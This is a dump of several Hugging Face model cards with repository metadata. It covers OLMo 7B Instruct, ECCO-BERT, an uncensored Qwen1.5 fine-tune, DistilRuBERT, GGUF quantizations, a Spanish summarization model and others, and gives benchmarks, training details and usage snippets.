| Model | MMLU 0-shot ↑ | AlpacaEval %win ↑ | ToxiGen % Toxic ↓ | TruthfulQA %Info+True ↑ |
|-----------------------|---------------|--------------------|--------------------|-------------------------|
| **OLMo (base)** | 28.3 | - | 81.4 | 31.6 |
| MPT Chat | 33.8 | 46.8 | 0.1 | 42.7 |
| Falcon Instruct | 25.2 | 14.0 | 70.7 | 27.2 |
| RPJ-INCITE Chat | 27.0 | 38.0 | 46.4 | 53.0 |
| Llama-2-Chat 7B | 46.8 | 87.3 | 0.0 | 26.3 |
| AI2 Tulu 2 7B | 50.4 | 73.9 | 7.0 | 51.7 |
| AI2 Tulu 2 7B DPO | 50.7 | 85.1 | 0.5 | - * |
| **[OLMo 7B SFT](https://huggingface.co/allenai/OLMo-7B-SFT)** | 47.3 | 57.0 | 14.4 | 41.2 |
| **[OLMo 7B Instruct](https://huggingface.co/allenai/OLMo-7B-Instruct)** | 46.2 | 69.3 | 1.7 | 52.0 |
*Following Ivison et al. 2023, we do not report Tulu 2 TruthfulQA scores due to test set contamination.
## Model Details
### Data
For training data details, please see the [Dolma](https://huggingface.co/datasets/allenai/dolma), [Tulu 2](https://huggingface.co/datasets/allenai/tulu-v2-sft-mixture), and [UltraFeedback](https://huggingface.co/datasets/openbmb/UltraFeedback) documentation.
### Architecture
### Hyperparameters
The hyperparameters for the two phases of training are below:
| | Learning Rate | Beta | Epochs | Warmup | Weight Decay | Gradient Clipping | Maximum Sequence Length |
|-------------------------|---------------|------|--------|------------------------------------------------------------------------|--------------|-------------------|-------------------------|
| **SFT** | 2 × 10^-6 | N/A | 3 | Linear warmup for the first 3% of total training time, then cooldown to 0 | 0 | 0 | 2048 |
| **DPO** | 5 × 10^-7 | 0.1 | 3 | Linear warmup for the first 10% of total training time, then cooldown to 0| 0 | 0 | 2048 |
Compared to Tulu 2, DPO hyperparameters are the same. SFT is lower LR and 3 epochs instead of 2 (and 2k length instead of 8k).
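For illustration only, the DPO row of the table above could be expressed with `trl`'s `DPOConfig` roughly as below; this is a hypothetical mapping (the actual training used AI2's open-instruct codebase), and the dataset/trainer wiring is omitted.
```python
from trl import DPOConfig

# Hypothetical translation of the DPO hyperparameters above into a trl config.
dpo_args = DPOConfig(
    output_dir="olmo-7b-dpo",
    learning_rate=5e-7,
    beta=0.1,                  # DPO beta from the table
    num_train_epochs=3,
    lr_scheduler_type="linear",
    warmup_ratio=0.1,          # linear warmup over the first 10% of training
    weight_decay=0.0,
    max_length=2048,           # maximum sequence length
)
```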
## Bias, Risks, and Limitations
This adapted OLMo model is a research artifact.
It is intended to benefit the research community interested in understanding the safety properties of LLMs and developers building safety tools for LLMs.
For this reason, the model does not include a specific safety filter or safety training data.
While our model scores well relative to its peers on ToxiGen, it is possible for the model to generate harmful and sensitive content from some user prompts.
We recommend developers exercise caution and consider the risks of the applications of this technology.
Furthermore, developers should consider implementing safeguards for biases, privacy, and other potential harms when appropriate.
Finally, as with every LLM, OLMo may produce factual-sounding outputs that may not be true, so developers and users are encouraged to confirm such outputs before relying on them.
All users of this model are responsible for how they use the model.
## Citation
**BibTeX:**
```
@article{Groeneveld2023OLMo,
title={OLMo: Accelerating the Science of Language Models},
author={Groeneveld, Dirk and Beltagy, Iz and Walsh, Pete and Bhagia, Akshita and Kinney, Rodney and Tafjord, Oyvind and Jha, Ananya Harsh and Ivison, Hamish and Magnusson, Ian and Wang, Yizhong and Arora, Shane and Atkinson, David and Authur, Russell and Chandu, Khyathi and Cohan, Arman and Dumas, Jennifer and Elazar, Yanai and Gu, Yuling and Hessel, Jack and Khot, Tushar and Merrill, William and Morrison, Jacob and Muennighoff, Niklas and Naik, Aakanksha and Nam, Crystal and Peters, Matthew E. and Pyatkin, Valentina and Ravichander, Abhilasha and Schwenk, Dustin and Shah, Saurabh and Smith, Will and Subramani, Nishant and Wortsman, Mitchell and Dasigi, Pradeep and Lambert, Nathan and Richardson, Kyle and Dodge, Jesse and Lo, Kyle and Soldaini, Luca and Smith, Noah A. and Hajishirzi, Hannaneh},
journal={Preprint},
year={2024}
}
```
**APA:**
Groeneveld, D., Beltagy, I., Walsh, P., Bhagia, A., Kinney, R., Tafjord, O., Jha, A., Ivison, H., Magnusson, I., Wang, Y., Arora, S., Atkinson, D., Authur, R., Chandu, K., Cohan, A., Dumas, J., Elazar, Y., Gu, Y., Hessel, J., Khot, T., Merrill, W., Morrison, J., Muennighoff, N., Naik, A., Nam, C., Peters, M., Pyatkin, V., Ravichander, A., Schwenk, D., Shah, S., Smith, W., Subramani, N., Wortsman, M., Dasigi, P., Lambert, N., Richardson, K., Dodge, J., Lo, K., Soldaini, L., Smith, N., & Hajishirzi, H. (2024). OLMo: Accelerating the Science of Language Models. Preprint.
## Model Card Contact
For errors in this model card, contact Nathan or Jacob, `{nathanl, jacobm} at allenai dot org`. |
TurkuNLP/eccobert-base-cased-v1 | TurkuNLP | "2022-04-13T16:57:18Z" | 3,634 | 0 | transformers | [
"transformers",
"pytorch",
"bert",
"pretraining",
"en",
"endpoints_compatible",
"region:us"
] | null | "2022-04-09T19:11:30Z" | ---
language: en
---
# ECCO-BERT base model (cased)
A pretrained BERT model trained exclusively on the ECCO (Eighteenth Century Collections Online) dataset of digitized documents published during the 18th century in the United Kingdom. The model is equivalent in size to [bert-base-cased](https://huggingface.co/bert-base-cased). The model is intended for fine-tuning on various tasks that use the ECCO dataset.
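Until the full documentation lands, a minimal feature-extraction sketch (not from the original card, and assuming the checkpoint loads cleanly with the generic `AutoModel` class) looks like this:
```python
from transformers import AutoTokenizer, AutoModel

name = "TurkuNLP/eccobert-base-cased-v1"
tokenizer = AutoTokenizer.from_pretrained(name)
model = AutoModel.from_pretrained(name)

# Encode an 18th-century-style sentence and take the [CLS] token embedding.
inputs = tokenizer("It is a truth universally acknowledged.", return_tensors="pt")
outputs = model(**inputs)
cls_embedding = outputs.last_hidden_state[:, 0]  # shape: (1, hidden_size)
print(cls_embedding.shape)
```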
Documentation in progress... |
abacusai/Liberated-Qwen1.5-14B | abacusai | "2024-03-05T05:53:24Z" | 3,634 | 16 | transformers | [
"transformers",
"pytorch",
"qwen2",
"text-generation",
"conversational",
"en",
"dataset:teknium/OpenHermes-2.5",
"dataset:m-a-p/Code-Feedback",
"dataset:m-a-p/CodeFeedback-Filtered-Instruction",
"dataset:abacusai/SystemChat",
"license:other",
"autotrain_compatible",
"endpoints_compatible",
"text-generation-inference",
"region:us"
] | text-generation | "2024-03-05T05:45:22Z" | ---
license: other
license_name: tongyi-qianwen
license_link: https://huggingface.co/Qwen/Qwen1.5-72B/blob/main/LICENSE
datasets:
- teknium/OpenHermes-2.5
- m-a-p/Code-Feedback
- m-a-p/CodeFeedback-Filtered-Instruction
- abacusai/SystemChat
language:
- en
---
<img href="https://abacus.ai" src="https://cdn-uploads.huggingface.co/production/uploads/64c14f6b02e1f8f67c73bd05/pf4d6FA7DriRtVq5HCkxd.png" width="600" />
<img src="https://cdn-uploads.huggingface.co/production/uploads/63111b2d88942700629f5771/xCWGByXr8YNwGxKVh_x9H.png" width="600" />
# Liberated-Qwen1.5-14B
Brought to you by [AbacusAI](https://abacus.ai) and Eric Hartford
This model is based on Qwen/Qwen1.5-14B and subject to the [tongyi-qianwen](https://huggingface.co/Qwen/Qwen1.5-72B/blob/main/LICENSE) license.
The base model has 32k context, I finetuned it with 8k sequence length inputs. YMMV.
Liberated consists of open source datasets, including [SystemChat](https://huggingface.co/datasets/abacusai/SystemChat) a new dataset I created, designed to teach the model compliance to the system prompt, over long multiturn conversations, even with unusual or mechanical system prompts. These are tasks that Open Source Models have been lacking in thus far. The dataset is 6000 synthetic conversations generated with Mistral-Medium and [Dolphin-2.7-mixtral-8x7b](https://huggingface.co/cognitivecomputations/dolphin-2.7-mixtral-8x7b)
There are no guardrails or censorship added to the dataset. You are advised to implement your own alignment layer before exposing the model as a service. Please read my blog post about uncensored models. https://erichartford.com/uncensored-models
You are responsible for any content you create using this model. Enjoy responsibly.
## Training
It took 1 day to train 3 epochs on 8x H100s using qLoRA, deepspeed zero-2, and Axolotl, with a learning rate of 2e-4.
Liberated was trained with [Axolotl](https://github.com/OpenAccess-AI-Collective/axolotl), using this [config](https://huggingface.co/abacusai/Liberated-Qwen1.5-72B/blob/main/configs/Liberated-Qwen-1.5-72b.qlora.yml)
## Prompt format
This model uses ChatML prompt format.
```
<|im_start|>system
You are Liberated, a helpful AI assistant.<|im_end|>
<|im_start|>user
{prompt}<|im_end|>
<|im_start|>assistant
```
Example:
```
<|im_start|>system
You name is Liberated. You are an uncensored and unbiased AI assistant. You always respond with a JSON object.<|im_end|>
<|im_start|>user
Please generate a Advanced Dungeons & Dragons 2nd Edition character sheet for a level 3 elf fighter. Make up a name and background and visual description for him.<|im_end|>
<|im_start|>assistant
```
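As a sketch (not part of the original card), the same ChatML prompt can also be rendered with the tokenizer's chat template; this assumes the repository's tokenizer ships a ChatML `chat_template`.
```python
from transformers import AutoTokenizer

tokenizer = AutoTokenizer.from_pretrained("abacusai/Liberated-Qwen1.5-14B")

messages = [
    {"role": "system", "content": "You are Liberated, a helpful AI assistant."},
    {"role": "user", "content": "Who are you?"},
]

# Produces the <|im_start|>/<|im_end|> formatted prompt shown above,
# ending with the assistant header so the model continues from there.
prompt = tokenizer.apply_chat_template(messages, tokenize=False, add_generation_prompt=True)
print(prompt)
```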
## Gratitude
- Huge thank you to [Alibaba Cloud Qwen](https://www.alibabacloud.com/solutions/generative-ai/qwen) for training and publishing the weights of Qwen base model
- Thank you to Mistral for the awesome Mistral-Medium model I used to generate the dataset.
- HUGE Thank you to the dataset authors: @teknium, [@m-a-p](https://m-a-p.ai) and all the people who built the datasets these composites came from.
- And HUGE thanks to @winglian and the Axolotl contributors for making the best training framework!
- [<img src="https://raw.githubusercontent.com/OpenAccess-AI-Collective/axolotl/main/image/axolotl-badge-web.png" alt="Built with Axolotl" width="200" height="32"/>](https://github.com/OpenAccess-AI-Collective/axolotl)
- Thank you to all the other people in the Open Source AI community who have taught me and helped me along the way.
## Example Output




## Evals
TBD
## Future Plans
This model will be released across the whole Qwen-1.5 series. |
akreal/tiny-random-BloomForCausalLM | akreal | "2023-03-29T18:37:17Z" | 3,633 | 0 | transformers | [
"transformers",
"pytorch",
"bloom",
"text-generation",
"autotrain_compatible",
"endpoints_compatible",
"text-generation-inference",
"region:us"
] | text-generation | "2023-07-26T23:02:11Z" | Entry not found |
DeepPavlov/distilrubert-tiny-cased-conversational | DeepPavlov | "2022-06-28T17:10:33Z" | 3,632 | 2 | transformers | [
"transformers",
"pytorch",
"distilbert",
"ru",
"arxiv:2205.02340",
"endpoints_compatible",
"region:us"
] | null | "2022-03-02T23:29:04Z" | ---
language:
- ru
---
WARNING: This is `distilrubert-small-cased-conversational` model uploaded with wrong name. This one is the same as [distilrubert-small-cased-conversational](https://huggingface.co/DeepPavlov/distilrubert-small-cased-conversational). `distilrubert-tiny-cased-conversational` could be found in [distilrubert-tiny-cased-conversational-v1](https://huggingface.co/DeepPavlov/distilrubert-tiny-cased-conversational-v1).
# distilrubert-small-cased-conversational
Conversational DistilRuBERT-small \(Russian, cased, 2‑layer, 768‑hidden, 12‑heads, 107M parameters\) was trained on OpenSubtitles\[1\], [Dirty](https://d3.ru/), [Pikabu](https://pikabu.ru/), and a Social Media segment of Taiga corpus\[2\] (as [Conversational RuBERT](https://huggingface.co/DeepPavlov/rubert-base-cased-conversational)). It can be considered as small copy of [Conversational DistilRuBERT-base](https://huggingface.co/DeepPavlov/distilrubert-base-cased-conversational).
Our DistilRuBERT-small was highly inspired by \[3\], \[4\]. Namely, we used
* KL loss (between teacher and student output logits)
* MLM loss (between tokens labels and student output logits)
* Cosine embedding loss (between averaged six consecutive hidden states from teacher's encoder and one hidden state of the student)
* MSE loss (between averaged six consecutive attention maps from teacher's encoder and one attention map of the student)
The model was trained for about 80 hrs. on 8 nVIDIA Tesla P100-SXM2.0 16Gb.
To evaluate improvements in the inference speed, we ran teacher and student models on random sequences with seq_len=512, batch_size = 16 (for throughput) and batch_size=1 (for latency).
All tests were performed on Intel(R) Xeon(R) CPU E5-2698 v4 @ 2.20GHz and nVIDIA Tesla P100-SXM2.0 16Gb.
| Model | Size, Mb. | CPU latency, sec.| GPU latency, sec. | CPU throughput, samples/sec. | GPU throughput, samples/sec. |
|-------------------------------------------------|------------|------------------|-------------------|------------------------------|------------------------------|
| Teacher (RuBERT-base-cased-conversational) | 679 | 0.655 | 0.031 | 0.3754 | 36.4902 |
| Student (DistilRuBERT-small-cased-conversational)| 409 | 0.1656 | 0.015 | 0.9692 | 71.3553 |
To evaluate model quality, we fine-tuned DistilRuBERT-small on classification, NER and question answering tasks. Scores and archives with fine-tuned models can be found in [DeepPavlov docs](http://docs.deeppavlov.ai/en/master/features/overview.html#models).
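A minimal loading sketch (not part of the original card; note that, as explained above, the weights in this repository are actually the small model):
```python
import torch
from transformers import AutoTokenizer, AutoModel

name = "DeepPavlov/distilrubert-tiny-cased-conversational"
tokenizer = AutoTokenizer.from_pretrained(name)
model = AutoModel.from_pretrained(name)

# Encode a short conversational Russian sentence and mean-pool the token embeddings.
inputs = tokenizer("привет, как дела?", return_tensors="pt")
with torch.no_grad():
    hidden = model(**inputs).last_hidden_state
sentence_embedding = hidden.mean(dim=1)  # shape: (1, 768)
print(sentence_embedding.shape)
```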
# Citation
If you found the model useful for your research, we kindly ask you to cite [this](https://arxiv.org/abs/2205.02340) paper:
```
@misc{https://doi.org/10.48550/arxiv.2205.02340,
doi = {10.48550/ARXIV.2205.02340},
url = {https://arxiv.org/abs/2205.02340},
author = {Kolesnikova, Alina and Kuratov, Yuri and Konovalov, Vasily and Burtsev, Mikhail},
keywords = {Computation and Language (cs.CL), Machine Learning (cs.LG), FOS: Computer and information sciences, FOS: Computer and information sciences},
title = {Knowledge Distillation of Russian Language Models with Reduction of Vocabulary},
publisher = {arXiv},
year = {2022},
copyright = {arXiv.org perpetual, non-exclusive license}
}
```
\[1\]: P. Lison and J. Tiedemann, 2016, OpenSubtitles2016: Extracting Large Parallel Corpora from Movie and TV Subtitles. In Proceedings of the 10th International Conference on Language Resources and Evaluation \(LREC 2016\)
\[2\]: Shavrina T., Shapovalova O. \(2017\) TO THE METHODOLOGY OF CORPUS CONSTRUCTION FOR MACHINE LEARNING: «TAIGA» SYNTAX TREE CORPUS AND PARSER. in proc. of “CORPORA2017”, international conference , Saint-Petersbourg, 2017.
\[3\]: Sanh, V., Debut, L., Chaumond, J., & Wolf, T. \(2019\). DistilBERT, a distilled version of BERT: smaller, faster, cheaper and lighter. arXiv preprint arXiv:1910.01108.
\[4\]: <https://github.com/huggingface/transformers/tree/master/examples/research_projects/distillation> |
anikulkar/DEI_strong_bias | anikulkar | "2024-05-08T07:07:19Z" | 3,632 | 0 | transformers | [
"transformers",
"safetensors",
"bert",
"text-classification",
"license:mit",
"autotrain_compatible",
"endpoints_compatible",
"region:us"
] | text-classification | "2024-05-08T07:04:16Z" | ---
license: mit
---
|
mradermacher/Garryvik-0.1-7b-GGUF | mradermacher | "2024-06-02T04:44:06Z" | 3,632 | 0 | transformers | [
"transformers",
"gguf",
"merge",
"mergekit",
"lazymergekit",
"alignment-handbook/zephyr-7b-sft-full",
"argilla/notus-7b-v1",
"en",
"base_model:powermove72/Garryvik-0.1-7b",
"endpoints_compatible",
"region:us"
] | null | "2024-06-02T04:18:15Z" | ---
base_model: powermove72/Garryvik-0.1-7b
language:
- en
library_name: transformers
quantized_by: mradermacher
tags:
- merge
- mergekit
- lazymergekit
- alignment-handbook/zephyr-7b-sft-full
- argilla/notus-7b-v1
---
## About
<!-- ### quantize_version: 2 -->
<!-- ### output_tensor_quantised: 1 -->
<!-- ### convert_type: hf -->
<!-- ### vocab_type: -->
<!-- ### tags: -->
static quants of https://huggingface.co/powermove72/Garryvik-0.1-7b
<!-- provided-files -->
weighted/imatrix quants seem not to be available (by me) at this time. If they do not show up a week or so after the static ones, I have probably not planned for them. Feel free to request them by opening a Community Discussion.
## Usage
If you are unsure how to use GGUF files, refer to one of [TheBloke's
READMEs](https://huggingface.co/TheBloke/KafkaLM-70B-German-V0.1-GGUF) for
more details, including on how to concatenate multi-part files.
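As one illustrative option (not from the original card), a single-file quant from the table below can be loaded with `llama-cpp-python`; the file name, context size, and prompt are assumptions.
```python
from llama_cpp import Llama

# Point model_path at a quant downloaded from this repository, e.g. the Q4_K_M file.
llm = Llama(model_path="Garryvik-0.1-7b.Q4_K_M.gguf", n_ctx=4096)

out = llm("Write one sentence about model merging.", max_tokens=64)
print(out["choices"][0]["text"])
```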
## Provided Quants
(sorted by size, not necessarily quality. IQ-quants are often preferable over similar sized non-IQ quants)
| Link | Type | Size/GB | Notes |
|:-----|:-----|--------:|:------|
| [GGUF](https://huggingface.co/mradermacher/Garryvik-0.1-7b-GGUF/resolve/main/Garryvik-0.1-7b.Q2_K.gguf) | Q2_K | 2.8 | |
| [GGUF](https://huggingface.co/mradermacher/Garryvik-0.1-7b-GGUF/resolve/main/Garryvik-0.1-7b.IQ3_XS.gguf) | IQ3_XS | 3.1 | |
| [GGUF](https://huggingface.co/mradermacher/Garryvik-0.1-7b-GGUF/resolve/main/Garryvik-0.1-7b.Q3_K_S.gguf) | Q3_K_S | 3.3 | |
| [GGUF](https://huggingface.co/mradermacher/Garryvik-0.1-7b-GGUF/resolve/main/Garryvik-0.1-7b.IQ3_S.gguf) | IQ3_S | 3.3 | beats Q3_K* |
| [GGUF](https://huggingface.co/mradermacher/Garryvik-0.1-7b-GGUF/resolve/main/Garryvik-0.1-7b.IQ3_M.gguf) | IQ3_M | 3.4 | |
| [GGUF](https://huggingface.co/mradermacher/Garryvik-0.1-7b-GGUF/resolve/main/Garryvik-0.1-7b.Q3_K_M.gguf) | Q3_K_M | 3.6 | lower quality |
| [GGUF](https://huggingface.co/mradermacher/Garryvik-0.1-7b-GGUF/resolve/main/Garryvik-0.1-7b.Q3_K_L.gguf) | Q3_K_L | 3.9 | |
| [GGUF](https://huggingface.co/mradermacher/Garryvik-0.1-7b-GGUF/resolve/main/Garryvik-0.1-7b.IQ4_XS.gguf) | IQ4_XS | 4.0 | |
| [GGUF](https://huggingface.co/mradermacher/Garryvik-0.1-7b-GGUF/resolve/main/Garryvik-0.1-7b.Q4_K_S.gguf) | Q4_K_S | 4.2 | fast, recommended |
| [GGUF](https://huggingface.co/mradermacher/Garryvik-0.1-7b-GGUF/resolve/main/Garryvik-0.1-7b.Q4_K_M.gguf) | Q4_K_M | 4.5 | fast, recommended |
| [GGUF](https://huggingface.co/mradermacher/Garryvik-0.1-7b-GGUF/resolve/main/Garryvik-0.1-7b.Q5_K_S.gguf) | Q5_K_S | 5.1 | |
| [GGUF](https://huggingface.co/mradermacher/Garryvik-0.1-7b-GGUF/resolve/main/Garryvik-0.1-7b.Q5_K_M.gguf) | Q5_K_M | 5.2 | |
| [GGUF](https://huggingface.co/mradermacher/Garryvik-0.1-7b-GGUF/resolve/main/Garryvik-0.1-7b.Q6_K.gguf) | Q6_K | 6.0 | very good quality |
| [GGUF](https://huggingface.co/mradermacher/Garryvik-0.1-7b-GGUF/resolve/main/Garryvik-0.1-7b.Q8_0.gguf) | Q8_0 | 7.8 | fast, best quality |
| [GGUF](https://huggingface.co/mradermacher/Garryvik-0.1-7b-GGUF/resolve/main/Garryvik-0.1-7b.f16.gguf) | f16 | 14.6 | 16 bpw, overkill |
Here is a handy graph by ikawrakow comparing some lower-quality quant
types (lower is better):

And here are Artefact2's thoughts on the matter:
https://gist.github.com/Artefact2/b5f810600771265fc1e39442288e8ec9
## FAQ / Model Request
See https://huggingface.co/mradermacher/model_requests for some answers to
questions you might have and/or if you want some other model quantized.
## Thanks
I thank my company, [nethype GmbH](https://www.nethype.de/), for letting
me use its servers and providing upgrades to my workstation to enable
this work in my free time.
<!-- end -->
|
mrm8488/bert2bert_shared-spanish-finetuned-summarization | mrm8488 | "2023-05-02T18:59:18Z" | 3,631 | 31 | transformers | [
"transformers",
"pytorch",
"safetensors",
"encoder-decoder",
"text2text-generation",
"summarization",
"news",
"es",
"dataset:mlsum",
"autotrain_compatible",
"endpoints_compatible",
"region:us"
] | summarization | "2022-03-02T23:29:05Z" | ---
tags:
- summarization
- news
language: es
datasets:
- mlsum
widget:
- text: 'Al filo de las 22.00 horas del jueves, la Asamblea de Madrid vive un momento sorprendente: Vox decide no apoyar una propuesta del PP en favor del blindaje fiscal de la Comunidad. Se ha roto la unidad de los tres partidos de derechas. Es un hecho excepcional. Desde que arrancó la legislatura, PP, Cs y Vox han votado en bloque casi el 75% de las veces en el pleno de la Cámara. Juntos decidieron la composición de la Mesa de la Asamblea. Juntos invistieron presidenta a Isabel Díaz Ayuso. Y juntos han votado la mayoría de proposiciones no de ley, incluida la que ha marcado el esprint final de la campaña para las elecciones generales: acaban de instar al Gobierno de España a "la ilegalización inmediata" de los partidos separatistas "que atenten contra la unidad de la Nación". Los críticos de Cs no comparten el apoyo al texto de Vox contra el secesionisimo Ese balance retrata una necesidad antes que una complicidad, según fuentes del PP con predicamento en la dirección regional y nacional. Tras casi 15 años gobernando con mayoría absoluta, la formación conservadora vivió como una tortura la pasada legislatura, en la que dependió de Cs para sacar adelante sus iniciativas. El problema se agudizó tras las elecciones autonómicas de mayo. El PP ha tenido que formar con Cs el primer gobierno de coalición de la historia de la región, y ni siquiera con eso le basta para ganar las votaciones de la Cámara. Los dos socios gubernamentales necesitan a Vox, la menos predecible de las tres formaciones. "Tenemos que trabajar juntos defendiendo la unidad del país, por eso no quisimos dejar a Vox solo", dijo ayer Díaz Ayuso para justificar el apoyo de PP y Cs a la proposición de la extrema derecha sobre Cataluña. "Después nosotros llevábamos otra proposición para defender el blindaje fiscal de Madrid, y ahí Vox nos dejó atrás. No permitió que esto saliera. Es un grave error por su parte", prosiguió, recalcando el enfado del PP. "Demuestra que está más en cuestiones electoralistas", subrayó. "Los que pensamos, con nuestras inmensas diferencias, que tenemos cosas en común que nos unen como partidos que queremos Comunidades libres, con bajos impuestos, en las que se viva con seguridad y en paz, tenemos que estar unidos", argumentó. "Y por lo menos nosotros de nuestra línea no nos separamos". Al contrario de lo que está ocurriendo el Ayuntamiento de Madrid, donde el PP y Cs ya han defendido posiciones de voto distintas, pese a compartir el Gobierno, en la Asamblea los partidos de Díaz Ayuso e Ignacio Aguado están actuando con la máxima lealtad en las votaciones del pleno. Otra cosa son las comisiones. Y el caso Avalmadrid. Es en ese terreno donde Cs y Vox están buscando el margen de maniobra necesario para separarse del PP en plena campaña electoral, abandonando a su suerte a su socio para distinguirse ante los electores. —"Usted me ha dejado tirada", le espetó la presidenta de la Comunidad de Madrid a Rocío Monasterio tras saber que Vox permitiría que la izquierda tuviera mayoría en la comisión parlamentaria que investigará los avales concedidos por la empresa semipública entre 2007 y 2018, lo que podría incluir el de 400.000 euros aprobado en 2011, y nunca devuelto al completo, para una empresa participada por el padre de Isabel Díaz Ayuso. "Monasterio no es de fiar. 
Dice una cosa y hace la contraria", dice una fuente popular sobre las negociaciones mantenidas para repartirse los puestos de las diferentes comisiones, que Vox no cumplió tras buscar un segundo pacto con otras formaciones (que no llegó a buen puerto). Ilegalización de Vox Los tres partidos de derechas también se han enfrentado por la ubicación de Vox en el pleno. Las largas negociaciones para la investidura de Díaz Ayuso dejaron heridas abiertas. Y los diputados de Cs no desaprovechan la oportunidad de lanzar dardos contra los de Vox, pero luego coinciden con ellos en la mayoría de votaciones. Ocurrió, por ejemplo, el jueves, cuando se debatía la polémica proposición para instar al Gobierno nacional a ilegalizar a los partidos separatistas que atenten contra la unidad de España. —"Mostrar nuestra sorpresa ante la presentación por parte de Vox de esta propuesta", lanzó Araceli Gómez, diputada de la formación de Aguado. "Sorprende que planteen ustedes este asunto cuando está también sobre la mesa el debate de su propia ilegalización por atentar contra el ordenamiento jurídico o contra valores constitucionales como la igualdad o la no discriminación". Luego de esa descalificación, y ante la incredulidad de los diputados de los partidos de izquierdas, Cs unió sus votos a los de Vox y a los del PP. La decisión ha provocado polémica interna, como demuestra que Albert Rivera no la apoyara ayer explícitamente. Tampoco ha sido bien acogida por el sector crítico de la formación. Pero ha demostrado una cosa: en Madrid hay tres partidos que casi siempre votan como uno.'
---
# Spanish BERT2BERT (BETO) fine-tuned on MLSUM ES for summarization
## Model
[dccuchile/bert-base-spanish-wwm-cased](https://huggingface.co/dccuchile/bert-base-spanish-wwm-cased) (BERT Checkpoint)
## Dataset
**MLSUM** is the first large-scale MultiLingual SUMmarization dataset. Obtained from online newspapers, it contains 1.5M+ article/summary pairs in five different languages -- namely, French, German, **Spanish**, Russian, Turkish. Together with English newspapers from the popular CNN/Daily mail dataset, the collected data form a large scale multilingual dataset which can enable new research directions for the text summarization community. We report cross-lingual comparative analyses based on state-of-the-art systems. These highlight existing biases which motivate the use of a multi-lingual dataset.
[MLSUM es](https://huggingface.co/datasets/viewer/?dataset=mlsum)
## Results
|Set|Metric| Value|
|----|------|------|
| Test | Rouge2 - mid - precision | **9.6** |
| Test | Rouge2 - mid - recall | **8.4** |
| Test | Rouge2 - mid - fmeasure | **8.7** |
| Test | Rouge1 | 26.24 |
| Test | Rouge2 | 8.9 |
| Test | RougeL | 21.01|
| Test | RougeLsum | 21.02 |
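For reference, ROUGE numbers like the ones above can be recomputed with the Hugging Face `evaluate` library. The snippet below is a minimal sketch with placeholder prediction/reference strings; the exact aggregation behind the reported "mid" values is an assumption.
```python
# Minimal sketch: compute ROUGE for generated summaries with the `evaluate` library.
# The prediction/reference strings are placeholders, not MLSUM data.
import evaluate

rouge = evaluate.load("rouge")
predictions = ["resumen generado por el modelo"]   # summaries produced by the model
references = ["resumen de referencia del test"]    # gold summaries from the test split
scores = rouge.compute(predictions=predictions, references=references)
print(scores)  # keys include rouge1, rouge2, rougeL, rougeLsum
```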
## Usage
```python
import torch
from transformers import BertTokenizerFast, EncoderDecoderModel
device = 'cuda' if torch.cuda.is_available() else 'cpu'
ckpt = 'mrm8488/bert2bert_shared-spanish-finetuned-summarization'
tokenizer = BertTokenizerFast.from_pretrained(ckpt)
model = EncoderDecoderModel.from_pretrained(ckpt).to(device)
def generate_summary(text):
    inputs = tokenizer([text], padding="max_length", truncation=True, max_length=512, return_tensors="pt")
    input_ids = inputs.input_ids.to(device)
    attention_mask = inputs.attention_mask.to(device)
    output = model.generate(input_ids, attention_mask=attention_mask)
    return tokenizer.decode(output[0], skip_special_tokens=True)
text = "Your text here..."
generate_summary(text)
```
> Created by [Manuel Romero/@mrm8488](https://twitter.com/mrm8488) with the support of [Narrativa](https://www.narrativa.com/)
> Made with <span style="color: #e25555;">♥</span> in Spain
|
marcsun13/bloom-1b7_with_lm_head | marcsun13 | "2023-06-21T15:31:46Z" | 3,631 | 0 | transformers | [
"transformers",
"pytorch",
"bloom",
"text-generation",
"autotrain_compatible",
"endpoints_compatible",
"text-generation-inference",
"region:us"
] | text-generation | "2023-06-21T15:29:19Z" | Entry not found |
digiplay/m3u | digiplay | "2024-05-31T17:39:45Z" | 3,630 | 4 | diffusers | [
"diffusers",
"safetensors",
"stable-diffusion",
"stable-diffusion-diffusers",
"text-to-image",
"license:other",
"autotrain_compatible",
"endpoints_compatible",
"diffusers:StableDiffusionPipeline",
"region:us"
] | text-to-image | "2023-07-02T11:36:28Z" | ---
license: other
tags:
- stable-diffusion
- stable-diffusion-diffusers
- text-to-image
- diffusers
inference: true
---
***This model is currently in testing.***
*Sample images & prompt example :*
8k UHD RAW,photorealistic ,beautiful _your keywords_ ,tiny smile ,close-up ,masterpiece ,realistic ,ultra detailed,




girl ,19y.o, silver white wavy hair, in front ,looking at viewer ,angel wings, (sky),ultra-detailed ,8k,very detailed ,light and shadow ,detailed paint , realistic,

|
kyujinpy/Sakura-SOLAR-Instruct | kyujinpy | "2024-03-04T12:15:57Z" | 3,628 | 28 | transformers | [
"transformers",
"safetensors",
"llama",
"text-generation",
"merge",
"conversational",
"en",
"license:cc-by-nc-sa-4.0",
"model-index",
"autotrain_compatible",
"endpoints_compatible",
"text-generation-inference",
"region:us"
] | text-generation | "2023-12-24T10:30:56Z" | ---
language:
- en
license: cc-by-nc-sa-4.0
tags:
- merge
pipeline_tag: text-generation
model-index:
- name: Sakura-SOLAR-Instruct
results:
- task:
type: text-generation
name: Text Generation
dataset:
name: AI2 Reasoning Challenge (25-Shot)
type: ai2_arc
config: ARC-Challenge
split: test
args:
num_few_shot: 25
metrics:
- type: acc_norm
value: 70.99
name: normalized accuracy
source:
url: https://huggingface.co/spaces/HuggingFaceH4/open_llm_leaderboard?query=kyujinpy/Sakura-SOLAR-Instruct
name: Open LLM Leaderboard
- task:
type: text-generation
name: Text Generation
dataset:
name: HellaSwag (10-Shot)
type: hellaswag
split: validation
args:
num_few_shot: 10
metrics:
- type: acc_norm
value: 88.42
name: normalized accuracy
source:
url: https://huggingface.co/spaces/HuggingFaceH4/open_llm_leaderboard?query=kyujinpy/Sakura-SOLAR-Instruct
name: Open LLM Leaderboard
- task:
type: text-generation
name: Text Generation
dataset:
name: MMLU (5-Shot)
type: cais/mmlu
config: all
split: test
args:
num_few_shot: 5
metrics:
- type: acc
value: 66.33
name: accuracy
source:
url: https://huggingface.co/spaces/HuggingFaceH4/open_llm_leaderboard?query=kyujinpy/Sakura-SOLAR-Instruct
name: Open LLM Leaderboard
- task:
type: text-generation
name: Text Generation
dataset:
name: TruthfulQA (0-shot)
type: truthful_qa
config: multiple_choice
split: validation
args:
num_few_shot: 0
metrics:
- type: mc2
value: 71.79
source:
url: https://huggingface.co/spaces/HuggingFaceH4/open_llm_leaderboard?query=kyujinpy/Sakura-SOLAR-Instruct
name: Open LLM Leaderboard
- task:
type: text-generation
name: Text Generation
dataset:
name: Winogrande (5-shot)
type: winogrande
config: winogrande_xl
split: validation
args:
